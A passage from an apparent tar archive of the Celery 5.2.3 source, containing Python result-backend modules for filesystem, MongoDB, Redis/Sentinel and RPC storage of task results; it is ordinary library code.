keys] def delete(self, key): self.server.delete(index=self.index, doc_type=self.doc_type, id=key) def _get_server(self): """Connect to the Elasticsearch server.""" http_auth = None if self.username and self.password: http_auth = (self.username, self.password) return elasticsearch.Elasticsearch( f'{self.host}:{self.port}', retry_on_timeout=self.es_retry_on_timeout, max_retries=self.es_max_retries, timeout=self.es_timeout, scheme=self.scheme, http_auth=http_auth, ) @property def server(self): if self._server is None: self._server = self._get_server() return self._server ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/filesystem.py0000664000175000017500000000726200000000000020477 0ustar00asifasif00000000000000"""File-system result store backend.""" import locale import os from datetime import datetime from kombu.utils.encoding import ensure_bytes from celery import uuid from celery.backends.base import KeyValueStoreBackend from celery.exceptions import ImproperlyConfigured default_encoding = locale.getpreferredencoding(False) E_NO_PATH_SET = 'You need to configure a path for the file-system backend' E_PATH_NON_CONFORMING_SCHEME = ( 'A path for the file-system backend should conform to the file URI scheme' ) E_PATH_INVALID = """\ The configured path for the file-system backend does not work correctly, please make sure that it exists and has the correct permissions.\ """ class FilesystemBackend(KeyValueStoreBackend): """File-system result backend. Arguments: url (str): URL to the directory we should use open (Callable): open function to use when opening files unlink (Callable): unlink function to use when deleting files sep (str): directory separator (to join the directory with the key) encoding (str): encoding used on the file-system """ def __init__(self, url=None, open=open, unlink=os.unlink, sep=os.sep, encoding=default_encoding, *args, **kwargs): super().__init__(*args, **kwargs) self.url = url path = self._find_path(url) # Remove forwarding "/" for Windows os if os.name == "nt" and path.startswith("/"): path = path[1:] # We need the path and separator as bytes objects self.path = path.encode(encoding) self.sep = sep.encode(encoding) self.open = open self.unlink = unlink # Lets verify that we've everything setup right self._do_directory_test(b'.fs-backend-' + uuid().encode(encoding)) def __reduce__(self, args=(), kwargs={}): kwargs.update( dict(url=self.url)) return super().__reduce__(args, kwargs) def _find_path(self, url): if not url: raise ImproperlyConfigured(E_NO_PATH_SET) if url.startswith('file://localhost/'): return url[16:] if url.startswith('file://'): return url[7:] raise ImproperlyConfigured(E_PATH_NON_CONFORMING_SCHEME) def _do_directory_test(self, key): try: self.set(key, b'test value') assert self.get(key) == b'test value' self.delete(key) except OSError: raise ImproperlyConfigured(E_PATH_INVALID) def _filename(self, key): return self.sep.join((self.path, key)) def get(self, key): try: with self.open(self._filename(key), 'rb') as infile: return infile.read() except FileNotFoundError: pass def set(self, key, value): with self.open(self._filename(key), 'wb') as outfile: outfile.write(ensure_bytes(value)) def mget(self, keys): for key in keys: yield self.get(key) def delete(self, key): self.unlink(self._filename(key)) def cleanup(self): """Delete expired meta-data.""" if not self.expires: return epoch = datetime(1970, 1, 1, tzinfo=self.app.timezone) now_ts = (self.app.now() - epoch).total_seconds() cutoff_ts = now_ts - self.expires for filename in os.listdir(self.path): for prefix in (self.task_keyprefix, self.group_keyprefix, self.chord_keyprefix): if filename.startswith(prefix): path = os.path.join(self.path, filename) if os.stat(path).st_mtime < cutoff_ts: self.unlink(path) break ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/backends/mongodb.py0000664000175000017500000002474500000000000017745 0ustar00asifasif00000000000000"""MongoDB result store backend.""" from datetime import datetime, timedelta from kombu.exceptions import EncodeError from kombu.utils.objects import cached_property from kombu.utils.url import maybe_sanitize_url, urlparse from celery import states from celery.exceptions import ImproperlyConfigured from .base import BaseBackend try: import pymongo except ImportError: # pragma: no cover pymongo = None if pymongo: try: from bson.binary import Binary except ImportError: # pragma: no cover from pymongo.binary import Binary from pymongo.errors import InvalidDocument else: # pragma: no cover Binary = None class InvalidDocument(Exception): pass __all__ = ('MongoBackend',) BINARY_CODECS = frozenset(['pickle', 'msgpack']) class MongoBackend(BaseBackend): """MongoDB result backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`pymongo` is not available. """ mongo_host = None host = 'localhost' port = 27017 user = None password = None database_name = 'celery' taskmeta_collection = 'celery_taskmeta' groupmeta_collection = 'celery_groupmeta' max_pool_size = 10 options = None supports_autoexpire = False _connection = None def __init__(self, app=None, **kwargs): self.options = {} super().__init__(app, **kwargs) if not pymongo: raise ImproperlyConfigured( 'You need to install the pymongo library to use the ' 'MongoDB backend.') # Set option defaults for key, value in self._prepare_client_options().items(): self.options.setdefault(key, value) # update conf with mongo uri data, only if uri was given if self.url: self.url = self._ensure_mongodb_uri_compliance(self.url) uri_data = pymongo.uri_parser.parse_uri(self.url) # build the hosts list to create a mongo connection hostslist = [ f'{x[0]}:{x[1]}' for x in uri_data['nodelist'] ] self.user = uri_data['username'] self.password = uri_data['password'] self.mongo_host = hostslist if uri_data['database']: # if no database is provided in the uri, use default self.database_name = uri_data['database'] self.options.update(uri_data['options']) # update conf with specific settings config = self.app.conf.get('mongodb_backend_settings') if config is not None: if not isinstance(config, dict): raise ImproperlyConfigured( 'MongoDB backend settings should be grouped in a dict') config = dict(config) # don't modify original if 'host' in config or 'port' in config: # these should take over uri conf self.mongo_host = None self.host = config.pop('host', self.host) self.port = config.pop('port', self.port) self.mongo_host = config.pop('mongo_host', self.mongo_host) self.user = config.pop('user', self.user) self.password = config.pop('password', self.password) self.database_name = config.pop('database', self.database_name) self.taskmeta_collection = config.pop( 'taskmeta_collection', self.taskmeta_collection, ) self.groupmeta_collection = config.pop( 'groupmeta_collection', self.groupmeta_collection, ) self.options.update(config.pop('options', {})) self.options.update(config) @staticmethod def _ensure_mongodb_uri_compliance(url): parsed_url = urlparse(url) if not parsed_url.scheme.startswith('mongodb'): url = f'mongodb+{url}' if url == 'mongodb://': url += 'localhost' return url def _prepare_client_options(self): if pymongo.version_tuple >= (3,): return {'maxPoolSize': self.max_pool_size} else: # pragma: no cover return {'max_pool_size': self.max_pool_size, 'auto_start_request': False} def _get_connection(self): """Connect to the MongoDB server.""" if self._connection is None: from pymongo import MongoClient host = self.mongo_host if not host: # The first pymongo.Connection() argument (host) can be # a list of ['host:port'] elements or a mongodb connection # URI. If this is the case, don't use self.port # but let pymongo get the port(s) from the URI instead. # This enables the use of replica sets and sharding. # See pymongo.Connection() for more info. host = self.host if isinstance(host, str) \ and not host.startswith('mongodb://'): host = f'mongodb://{host}:{self.port}' # don't change self.options conf = dict(self.options) conf['host'] = host if self.user: conf['username'] = self.user if self.password: conf['password'] = self.password self._connection = MongoClient(**conf) return self._connection def encode(self, data): if self.serializer == 'bson': # mongodb handles serialization return data payload = super().encode(data) # serializer which are in a unsupported format (pickle/binary) if self.serializer in BINARY_CODECS: payload = Binary(payload) return payload def decode(self, data): if self.serializer == 'bson': return data return super().decode(data) def _store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Store return value and state of an executed task.""" meta = self._get_result_meta(result=self.encode(result), state=state, traceback=traceback, request=request) # Add the _id for mongodb meta['_id'] = task_id try: self.collection.replace_one({'_id': task_id}, meta, upsert=True) except InvalidDocument as exc: raise EncodeError(exc) return result def _get_task_meta_for(self, task_id): """Get task meta-data for a task by id.""" obj = self.collection.find_one({'_id': task_id}) if obj: return self.meta_from_decoded({ 'task_id': obj['_id'], 'status': obj['status'], 'result': self.decode(obj['result']), 'date_done': obj['date_done'], 'traceback': obj['traceback'], 'children': obj['children'], }) return {'status': states.PENDING, 'result': None} def _save_group(self, group_id, result): """Save the group result.""" meta = { '_id': group_id, 'result': self.encode([i.id for i in result]), 'date_done': datetime.utcnow(), } self.group_collection.replace_one({'_id': group_id}, meta, upsert=True) return result def _restore_group(self, group_id): """Get the result for a group by id.""" obj = self.group_collection.find_one({'_id': group_id}) if obj: return { 'task_id': obj['_id'], 'date_done': obj['date_done'], 'result': [ self.app.AsyncResult(task) for task in self.decode(obj['result']) ], } def _delete_group(self, group_id): """Delete a group by id.""" self.group_collection.delete_one({'_id': group_id}) def _forget(self, task_id): """Remove result from MongoDB. Raises: pymongo.exceptions.OperationsError: if the task_id could not be removed. """ # By using safe=True, this will wait until it receives a response from # the server. Likewise, it will raise an OperationsError if the # response was unable to be completed. self.collection.delete_one({'_id': task_id}) def cleanup(self): """Delete expired meta-data.""" if not self.expires: return self.collection.delete_many( {'date_done': {'$lt': self.app.now() - self.expires_delta}}, ) self.group_collection.delete_many( {'date_done': {'$lt': self.app.now() - self.expires_delta}}, ) def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs return super().__reduce__( args, dict(kwargs, expires=self.expires, url=self.url)) def _get_database(self): conn = self._get_connection() return conn[self.database_name] @cached_property def database(self): """Get database from MongoDB connection. performs authentication if necessary. """ return self._get_database() @cached_property def collection(self): """Get the meta-data task collection.""" collection = self.database[self.taskmeta_collection] # Ensure an index on date_done is there, if not process the index # in the background. Once completed cleanup will be much faster collection.create_index('date_done', background=True) return collection @cached_property def group_collection(self): """Get the meta-data task collection.""" collection = self.database[self.groupmeta_collection] # Ensure an index on date_done is there, if not process the index # in the background. Once completed cleanup will be much faster collection.create_index('date_done', background=True) return collection @cached_property def expires_delta(self): return timedelta(seconds=self.expires) def as_uri(self, include_password=False): """Return the backend as an URI. Arguments: include_password (bool): Password censored if disabled. """ if not self.url: return 'mongodb://' if include_password: return self.url if ',' not in self.url: return maybe_sanitize_url(self.url) uri1, remainder = self.url.split(',', 1) return ','.join([maybe_sanitize_url(uri1), remainder]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/backends/redis.py0000664000175000017500000006242700000000000017425 0ustar00asifasif00000000000000"""Redis result store backend.""" import time from contextlib import contextmanager from functools import partial from ssl import CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED from urllib.parse import unquote from kombu.utils.functional import retry_over_time from kombu.utils.objects import cached_property from kombu.utils.url import _parse_url, maybe_sanitize_url from celery import states from celery._state import task_join_will_block from celery.canvas import maybe_signature from celery.exceptions import (BackendStoreError, ChordError, ImproperlyConfigured) from celery.result import GroupResult, allow_join_result from celery.utils.functional import _regen, dictfilter from celery.utils.log import get_logger from celery.utils.time import humanize_seconds from .asynchronous import AsyncBackendMixin, BaseResultConsumer from .base import BaseKeyValueStoreBackend try: import redis.connection from kombu.transport.redis import get_redis_error_classes except ImportError: # pragma: no cover redis = None get_redis_error_classes = None try: import redis.sentinel except ImportError: pass __all__ = ('RedisBackend', 'SentinelBackend') E_REDIS_MISSING = """ You need to install the redis library in order to use \ the Redis result store backend. """ E_REDIS_SENTINEL_MISSING = """ You need to install the redis library with support of \ sentinel in order to use the Redis result store backend. """ W_REDIS_SSL_CERT_OPTIONAL = """ Setting ssl_cert_reqs=CERT_OPTIONAL when connecting to redis means that \ celery might not validate the identity of the redis broker when connecting. \ This leaves you vulnerable to man in the middle attacks. """ W_REDIS_SSL_CERT_NONE = """ Setting ssl_cert_reqs=CERT_NONE when connecting to redis means that celery \ will not validate the identity of the redis broker when connecting. This \ leaves you vulnerable to man in the middle attacks. """ E_REDIS_SSL_PARAMS_AND_SCHEME_MISMATCH = """ SSL connection parameters have been provided but the specified URL scheme \ is redis://. A Redis SSL connection URL should use the scheme rediss://. """ E_REDIS_SSL_CERT_REQS_MISSING_INVALID = """ A rediss:// URL must have parameter ssl_cert_reqs and this must be set to \ CERT_REQUIRED, CERT_OPTIONAL, or CERT_NONE """ E_LOST = 'Connection to Redis lost: Retry (%s/%s) %s.' E_RETRY_LIMIT_EXCEEDED = """ Retry limit exceeded while trying to reconnect to the Celery redis result \ store backend. The Celery application must be restarted. """ logger = get_logger(__name__) class ResultConsumer(BaseResultConsumer): _pubsub = None def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._get_key_for_task = self.backend.get_key_for_task self._decode_result = self.backend.decode_result self._ensure = self.backend.ensure self._connection_errors = self.backend.connection_errors self.subscribed_to = set() def on_after_fork(self): try: self.backend.client.connection_pool.reset() if self._pubsub is not None: self._pubsub.close() except KeyError as e: logger.warning(str(e)) super().on_after_fork() def _reconnect_pubsub(self): self._pubsub = None self.backend.client.connection_pool.reset() # task state might have changed when the connection was down so we # retrieve meta for all subscribed tasks before going into pubsub mode metas = self.backend.client.mget(self.subscribed_to) metas = [meta for meta in metas if meta] for meta in metas: self.on_state_change(self._decode_result(meta), None) self._pubsub = self.backend.client.pubsub( ignore_subscribe_messages=True, ) if self.subscribed_to: self._pubsub.subscribe(*self.subscribed_to) @contextmanager def reconnect_on_error(self): try: yield except self._connection_errors: try: self._ensure(self._reconnect_pubsub, ()) except self._connection_errors: logger.critical(E_RETRY_LIMIT_EXCEEDED) raise def _maybe_cancel_ready_task(self, meta): if meta['status'] in states.READY_STATES: self.cancel_for(meta['task_id']) def on_state_change(self, meta, message): super().on_state_change(meta, message) self._maybe_cancel_ready_task(meta) def start(self, initial_task_id, **kwargs): self._pubsub = self.backend.client.pubsub( ignore_subscribe_messages=True, ) self._consume_from(initial_task_id) def on_wait_for_pending(self, result, **kwargs): for meta in result._iter_meta(**kwargs): if meta is not None: self.on_state_change(meta, None) def stop(self): if self._pubsub is not None: self._pubsub.close() def drain_events(self, timeout=None): if self._pubsub: with self.reconnect_on_error(): message = self._pubsub.get_message(timeout=timeout) if message and message['type'] == 'message': self.on_state_change(self._decode_result(message['data']), message) elif timeout: time.sleep(timeout) def consume_from(self, task_id): if self._pubsub is None: return self.start(task_id) self._consume_from(task_id) def _consume_from(self, task_id): key = self._get_key_for_task(task_id) if key not in self.subscribed_to: self.subscribed_to.add(key) with self.reconnect_on_error(): self._pubsub.subscribe(key) def cancel_for(self, task_id): key = self._get_key_for_task(task_id) self.subscribed_to.discard(key) if self._pubsub: with self.reconnect_on_error(): self._pubsub.unsubscribe(key) class RedisBackend(BaseKeyValueStoreBackend, AsyncBackendMixin): """Redis task result store. It makes use of the following commands: GET, MGET, DEL, INCRBY, EXPIRE, SET, SETEX """ ResultConsumer = ResultConsumer #: :pypi:`redis` client module. redis = redis connection_class_ssl = redis.SSLConnection if redis else None #: Maximum number of connections in the pool. max_connections = None supports_autoexpire = True supports_native_join = True #: Maximal length of string value in Redis. #: 512 MB - https://redis.io/topics/data-types _MAX_STR_VALUE_SIZE = 536870912 def __init__(self, host=None, port=None, db=None, password=None, max_connections=None, url=None, connection_pool=None, **kwargs): super().__init__(expires_type=int, **kwargs) _get = self.app.conf.get if self.redis is None: raise ImproperlyConfigured(E_REDIS_MISSING.strip()) if host and '://' in host: url, host = host, None self.max_connections = ( max_connections or _get('redis_max_connections') or self.max_connections) self._ConnectionPool = connection_pool socket_timeout = _get('redis_socket_timeout') socket_connect_timeout = _get('redis_socket_connect_timeout') retry_on_timeout = _get('redis_retry_on_timeout') socket_keepalive = _get('redis_socket_keepalive') health_check_interval = _get('redis_backend_health_check_interval') self.connparams = { 'host': _get('redis_host') or 'localhost', 'port': _get('redis_port') or 6379, 'db': _get('redis_db') or 0, 'password': _get('redis_password'), 'max_connections': self.max_connections, 'socket_timeout': socket_timeout and float(socket_timeout), 'retry_on_timeout': retry_on_timeout or False, 'socket_connect_timeout': socket_connect_timeout and float(socket_connect_timeout), } username = _get('redis_username') if username: # We're extra careful to avoid including this configuration value # if it wasn't specified since older versions of py-redis # don't support specifying a username. # Only Redis>6.0 supports username/password authentication. # TODO: Include this in connparams' definition once we drop # support for py-redis<3.4.0. self.connparams['username'] = username if health_check_interval: self.connparams["health_check_interval"] = health_check_interval # absent in redis.connection.UnixDomainSocketConnection if socket_keepalive: self.connparams['socket_keepalive'] = socket_keepalive # "redis_backend_use_ssl" must be a dict with the keys: # 'ssl_cert_reqs', 'ssl_ca_certs', 'ssl_certfile', 'ssl_keyfile' # (the same as "broker_use_ssl") ssl = _get('redis_backend_use_ssl') if ssl: self.connparams.update(ssl) self.connparams['connection_class'] = self.connection_class_ssl if url: self.connparams = self._params_from_url(url, self.connparams) # If we've received SSL parameters via query string or the # redis_backend_use_ssl dict, check ssl_cert_reqs is valid. If set # via query string ssl_cert_reqs will be a string so convert it here if ('connection_class' in self.connparams and issubclass(self.connparams['connection_class'], redis.SSLConnection)): ssl_cert_reqs_missing = 'MISSING' ssl_string_to_constant = {'CERT_REQUIRED': CERT_REQUIRED, 'CERT_OPTIONAL': CERT_OPTIONAL, 'CERT_NONE': CERT_NONE, 'required': CERT_REQUIRED, 'optional': CERT_OPTIONAL, 'none': CERT_NONE} ssl_cert_reqs = self.connparams.get('ssl_cert_reqs', ssl_cert_reqs_missing) ssl_cert_reqs = ssl_string_to_constant.get(ssl_cert_reqs, ssl_cert_reqs) if ssl_cert_reqs not in ssl_string_to_constant.values(): raise ValueError(E_REDIS_SSL_CERT_REQS_MISSING_INVALID) if ssl_cert_reqs == CERT_OPTIONAL: logger.warning(W_REDIS_SSL_CERT_OPTIONAL) elif ssl_cert_reqs == CERT_NONE: logger.warning(W_REDIS_SSL_CERT_NONE) self.connparams['ssl_cert_reqs'] = ssl_cert_reqs self.url = url self.connection_errors, self.channel_errors = ( get_redis_error_classes() if get_redis_error_classes else ((), ())) self.result_consumer = self.ResultConsumer( self, self.app, self.accept, self._pending_results, self._pending_messages, ) def _params_from_url(self, url, defaults): scheme, host, port, username, password, path, query = _parse_url(url) connparams = dict( defaults, **dictfilter({ 'host': host, 'port': port, 'username': username, 'password': password, 'db': query.pop('virtual_host', None)}) ) if scheme == 'socket': # use 'path' as path to the socket… in this case # the database number should be given in 'query' connparams.update({ 'connection_class': self.redis.UnixDomainSocketConnection, 'path': '/' + path, }) # host+port are invalid options when using this connection type. connparams.pop('host', None) connparams.pop('port', None) connparams.pop('socket_connect_timeout') else: connparams['db'] = path ssl_param_keys = ['ssl_ca_certs', 'ssl_certfile', 'ssl_keyfile', 'ssl_cert_reqs'] if scheme == 'redis': # If connparams or query string contain ssl params, raise error if (any(key in connparams for key in ssl_param_keys) or any(key in query for key in ssl_param_keys)): raise ValueError(E_REDIS_SSL_PARAMS_AND_SCHEME_MISMATCH) if scheme == 'rediss': connparams['connection_class'] = redis.SSLConnection # The following parameters, if present in the URL, are encoded. We # must add the decoded values to connparams. for ssl_setting in ssl_param_keys: ssl_val = query.pop(ssl_setting, None) if ssl_val: connparams[ssl_setting] = unquote(ssl_val) # db may be string and start with / like in kombu. db = connparams.get('db') or 0 db = db.strip('/') if isinstance(db, str) else db connparams['db'] = int(db) for key, value in query.items(): if key in redis.connection.URL_QUERY_ARGUMENT_PARSERS: query[key] = redis.connection.URL_QUERY_ARGUMENT_PARSERS[key]( value ) # Query parameters override other parameters connparams.update(query) return connparams @cached_property def retry_policy(self): retry_policy = super().retry_policy if "retry_policy" in self._transport_options: retry_policy = retry_policy.copy() retry_policy.update(self._transport_options['retry_policy']) return retry_policy def on_task_call(self, producer, task_id): if not task_join_will_block(): self.result_consumer.consume_from(task_id) def get(self, key): return self.client.get(key) def mget(self, keys): return self.client.mget(keys) def ensure(self, fun, args, **policy): retry_policy = dict(self.retry_policy, **policy) max_retries = retry_policy.get('max_retries') return retry_over_time( fun, self.connection_errors, args, {}, partial(self.on_connection_error, max_retries), **retry_policy) def on_connection_error(self, max_retries, exc, intervals, retries): tts = next(intervals) logger.error( E_LOST.strip(), retries, max_retries or 'Inf', humanize_seconds(tts, 'in ')) return tts def set(self, key, value, **retry_policy): if isinstance(value, str) and len(value) > self._MAX_STR_VALUE_SIZE: raise BackendStoreError('value too large for Redis backend') return self.ensure(self._set, (key, value), **retry_policy) def _set(self, key, value): with self.client.pipeline() as pipe: if self.expires: pipe.setex(key, self.expires, value) else: pipe.set(key, value) pipe.publish(key, value) pipe.execute() def forget(self, task_id): super().forget(task_id) self.result_consumer.cancel_for(task_id) def delete(self, key): self.client.delete(key) def incr(self, key): return self.client.incr(key) def expire(self, key, value): return self.client.expire(key, value) def add_to_chord(self, group_id, result): self.client.incr(self.get_key_for_group(group_id, '.t'), 1) def _unpack_chord_result(self, tup, decode, EXCEPTION_STATES=states.EXCEPTION_STATES, PROPAGATE_STATES=states.PROPAGATE_STATES): _, tid, state, retval = decode(tup) if state in EXCEPTION_STATES: retval = self.exception_to_python(retval) if state in PROPAGATE_STATES: raise ChordError(f'Dependency {tid} raised {retval!r}') return retval def set_chord_size(self, group_id, chord_size): self.set(self.get_key_for_group(group_id, '.s'), chord_size) def apply_chord(self, header_result_args, body, **kwargs): # If any of the child results of this chord are complex (ie. group # results themselves), we need to save `header_result` to ensure that # the expected structure is retained when we finish the chord and pass # the results onward to the body in `on_chord_part_return()`. We don't # do this is all cases to retain an optimisation in the common case # where a chord header is comprised of simple result objects. if not isinstance(header_result_args[1], _regen): header_result = self.app.GroupResult(*header_result_args) if any(isinstance(nr, GroupResult) for nr in header_result.results): header_result.save(backend=self) @cached_property def _chord_zset(self): return self._transport_options.get('result_chord_ordered', True) @cached_property def _transport_options(self): return self.app.conf.get('result_backend_transport_options', {}) def on_chord_part_return(self, request, state, result, propagate=None, **kwargs): app = self.app tid, gid, group_index = request.id, request.group, request.group_index if not gid or not tid: return if group_index is None: group_index = '+inf' client = self.client jkey = self.get_key_for_group(gid, '.j') tkey = self.get_key_for_group(gid, '.t') skey = self.get_key_for_group(gid, '.s') result = self.encode_result(result, state) encoded = self.encode([1, tid, state, result]) with client.pipeline() as pipe: pipeline = ( pipe.zadd(jkey, {encoded: group_index}).zcount(jkey, "-inf", "+inf") if self._chord_zset else pipe.rpush(jkey, encoded).llen(jkey) ).get(tkey).get(skey) if self.expires: pipeline = pipeline \ .expire(jkey, self.expires) \ .expire(tkey, self.expires) \ .expire(skey, self.expires) _, readycount, totaldiff, chord_size_bytes = pipeline.execute()[:4] totaldiff = int(totaldiff or 0) if chord_size_bytes: try: callback = maybe_signature(request.chord, app=app) total = int(chord_size_bytes) + totaldiff if readycount == total: header_result = GroupResult.restore(gid) if header_result is not None: # If we manage to restore a `GroupResult`, then it must # have been complex and saved by `apply_chord()` earlier. # # Before we can join the `GroupResult`, it needs to be # manually marked as ready to avoid blocking header_result.on_ready() # We'll `join()` it to get the results and ensure they are # structured as intended rather than the flattened version # we'd construct without any other information. join_func = ( header_result.join_native if header_result.supports_native_join else header_result.join ) with allow_join_result(): resl = join_func( timeout=app.conf.result_chord_join_timeout, propagate=True ) else: # Otherwise simply extract and decode the results we # stashed along the way, which should be faster for large # numbers of simple results in the chord header. decode, unpack = self.decode, self._unpack_chord_result with client.pipeline() as pipe: if self._chord_zset: pipeline = pipe.zrange(jkey, 0, -1) else: pipeline = pipe.lrange(jkey, 0, total) resl, = pipeline.execute() resl = [unpack(tup, decode) for tup in resl] try: callback.delay(resl) except Exception as exc: # pylint: disable=broad-except logger.exception( 'Chord callback for %r raised: %r', request.group, exc) return self.chord_error_from_stack( callback, ChordError(f'Callback error: {exc!r}'), ) finally: with client.pipeline() as pipe: pipe \ .delete(jkey) \ .delete(tkey) \ .delete(skey) \ .execute() except ChordError as exc: logger.exception('Chord %r raised: %r', request.group, exc) return self.chord_error_from_stack(callback, exc) except Exception as exc: # pylint: disable=broad-except logger.exception('Chord %r raised: %r', request.group, exc) return self.chord_error_from_stack( callback, ChordError(f'Join error: {exc!r}'), ) def _create_client(self, **params): return self._get_client()( connection_pool=self._get_pool(**params), ) def _get_client(self): return self.redis.StrictRedis def _get_pool(self, **params): return self.ConnectionPool(**params) @property def ConnectionPool(self): if self._ConnectionPool is None: self._ConnectionPool = self.redis.ConnectionPool return self._ConnectionPool @cached_property def client(self): return self._create_client(**self.connparams) def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs return super().__reduce__( (self.url,), {'expires': self.expires}, ) if getattr(redis, "sentinel", None): class SentinelManagedSSLConnection( redis.sentinel.SentinelManagedConnection, redis.SSLConnection): """Connect to a Redis server using Sentinel + TLS. Use Sentinel to identify which Redis server is the current master to connect to and when connecting to the Master server, use an SSL Connection. """ class SentinelBackend(RedisBackend): """Redis sentinel task result store.""" # URL looks like `sentinel://0.0.0.0:26347/3;sentinel://0.0.0.0:26348/3` _SERVER_URI_SEPARATOR = ";" sentinel = getattr(redis, "sentinel", None) connection_class_ssl = SentinelManagedSSLConnection if sentinel else None def __init__(self, *args, **kwargs): if self.sentinel is None: raise ImproperlyConfigured(E_REDIS_SENTINEL_MISSING.strip()) super().__init__(*args, **kwargs) def as_uri(self, include_password=False): """Return the server addresses as URIs, sanitizing the password or not.""" # Allow superclass to do work if we don't need to force sanitization if include_password: return super().as_uri( include_password=include_password, ) # Otherwise we need to ensure that all components get sanitized rather # by passing them one by one to the `kombu` helper uri_chunks = ( maybe_sanitize_url(chunk) for chunk in (self.url or "").split(self._SERVER_URI_SEPARATOR) ) # Similar to the superclass, strip the trailing slash from URIs with # all components empty other than the scheme return self._SERVER_URI_SEPARATOR.join( uri[:-1] if uri.endswith(":///") else uri for uri in uri_chunks ) def _params_from_url(self, url, defaults): chunks = url.split(self._SERVER_URI_SEPARATOR) connparams = dict(defaults, hosts=[]) for chunk in chunks: data = super()._params_from_url( url=chunk, defaults=defaults) connparams['hosts'].append(data) for param in ("host", "port", "db", "password"): connparams.pop(param) # Adding db/password in connparams to connect to the correct instance for param in ("db", "password"): if connparams['hosts'] and param in connparams['hosts'][0]: connparams[param] = connparams['hosts'][0].get(param) return connparams def _get_sentinel_instance(self, **params): connparams = params.copy() hosts = connparams.pop("hosts") min_other_sentinels = self._transport_options.get("min_other_sentinels", 0) sentinel_kwargs = self._transport_options.get("sentinel_kwargs", {}) sentinel_instance = self.sentinel.Sentinel( [(cp['host'], cp['port']) for cp in hosts], min_other_sentinels=min_other_sentinels, sentinel_kwargs=sentinel_kwargs, **connparams) return sentinel_instance def _get_pool(self, **params): sentinel_instance = self._get_sentinel_instance(**params) master_name = self._transport_options.get("master_name", None) return sentinel_instance.master_for( service_name=master_name, redis_class=self._get_client(), ).connection_pool ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/rpc.py0000664000175000017500000002745500000000000017105 0ustar00asifasif00000000000000"""The ``RPC`` result backend for AMQP brokers. RPC-style result backend, using reply-to and one queue per client. """ import time import kombu from kombu.common import maybe_declare from kombu.utils.compat import register_after_fork from kombu.utils.objects import cached_property from celery import states from celery._state import current_task, task_join_will_block from . import base from .asynchronous import AsyncBackendMixin, BaseResultConsumer __all__ = ('BacklogLimitExceeded', 'RPCBackend') E_NO_CHORD_SUPPORT = """ The "rpc" result backend does not support chords! Note that a group chained with a task is also upgraded to be a chord, as this pattern requires synchronization. Result backends that supports chords: Redis, Database, Memcached, and more. """ class BacklogLimitExceeded(Exception): """Too much state history to fast-forward.""" def _on_after_fork_cleanup_backend(backend): backend._after_fork() class ResultConsumer(BaseResultConsumer): Consumer = kombu.Consumer _connection = None _consumer = None def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._create_binding = self.backend._create_binding def start(self, initial_task_id, no_ack=True, **kwargs): self._connection = self.app.connection() initial_queue = self._create_binding(initial_task_id) self._consumer = self.Consumer( self._connection.default_channel, [initial_queue], callbacks=[self.on_state_change], no_ack=no_ack, accept=self.accept) self._consumer.consume() def drain_events(self, timeout=None): if self._connection: return self._connection.drain_events(timeout=timeout) elif timeout: time.sleep(timeout) def stop(self): try: self._consumer.cancel() finally: self._connection.close() def on_after_fork(self): self._consumer = None if self._connection is not None: self._connection.collect() self._connection = None def consume_from(self, task_id): if self._consumer is None: return self.start(task_id) queue = self._create_binding(task_id) if not self._consumer.consuming_from(queue): self._consumer.add_queue(queue) self._consumer.consume() def cancel_for(self, task_id): if self._consumer: self._consumer.cancel_by_queue(self._create_binding(task_id).name) class RPCBackend(base.Backend, AsyncBackendMixin): """Base class for the RPC result backend.""" Exchange = kombu.Exchange Producer = kombu.Producer ResultConsumer = ResultConsumer #: Exception raised when there are too many messages for a task id. BacklogLimitExceeded = BacklogLimitExceeded persistent = False supports_autoexpire = True supports_native_join = True retry_policy = { 'max_retries': 20, 'interval_start': 0, 'interval_step': 1, 'interval_max': 1, } class Consumer(kombu.Consumer): """Consumer that requires manual declaration of queues.""" auto_declare = False class Queue(kombu.Queue): """Queue that never caches declaration.""" can_cache_declaration = False def __init__(self, app, connection=None, exchange=None, exchange_type=None, persistent=None, serializer=None, auto_delete=True, **kwargs): super().__init__(app, **kwargs) conf = self.app.conf self._connection = connection self._out_of_band = {} self.persistent = self.prepare_persistent(persistent) self.delivery_mode = 2 if self.persistent else 1 exchange = exchange or conf.result_exchange exchange_type = exchange_type or conf.result_exchange_type self.exchange = self._create_exchange( exchange, exchange_type, self.delivery_mode, ) self.serializer = serializer or conf.result_serializer self.auto_delete = auto_delete self.result_consumer = self.ResultConsumer( self, self.app, self.accept, self._pending_results, self._pending_messages, ) if register_after_fork is not None: register_after_fork(self, _on_after_fork_cleanup_backend) def _after_fork(self): # clear state for child processes. self._pending_results.clear() self.result_consumer._after_fork() def _create_exchange(self, name, type='direct', delivery_mode=2): # uses direct to queue routing (anon exchange). return self.Exchange(None) def _create_binding(self, task_id): """Create new binding for task with id.""" # RPC backend caches the binding, as one queue is used for all tasks. return self.binding def ensure_chords_allowed(self): raise NotImplementedError(E_NO_CHORD_SUPPORT.strip()) def on_task_call(self, producer, task_id): # Called every time a task is sent when using this backend. # We declare the queue we receive replies on in advance of sending # the message, but we skip this if running in the prefork pool # (task_join_will_block), as we know the queue is already declared. if not task_join_will_block(): maybe_declare(self.binding(producer.channel), retry=True) def destination_for(self, task_id, request): """Get the destination for result by task id. Returns: Tuple[str, str]: tuple of ``(reply_to, correlation_id)``. """ # Backends didn't always receive the `request`, so we must still # support old code that relies on current_task. try: request = request or current_task.request except AttributeError: raise RuntimeError( f'RPC backend missing task request for {task_id!r}') return request.reply_to, request.correlation_id or task_id def on_reply_declare(self, task_id): # Return value here is used as the `declare=` argument # for Producer.publish. # By default we don't have to declare anything when sending a result. pass def on_result_fulfilled(self, result): # This usually cancels the queue after the result 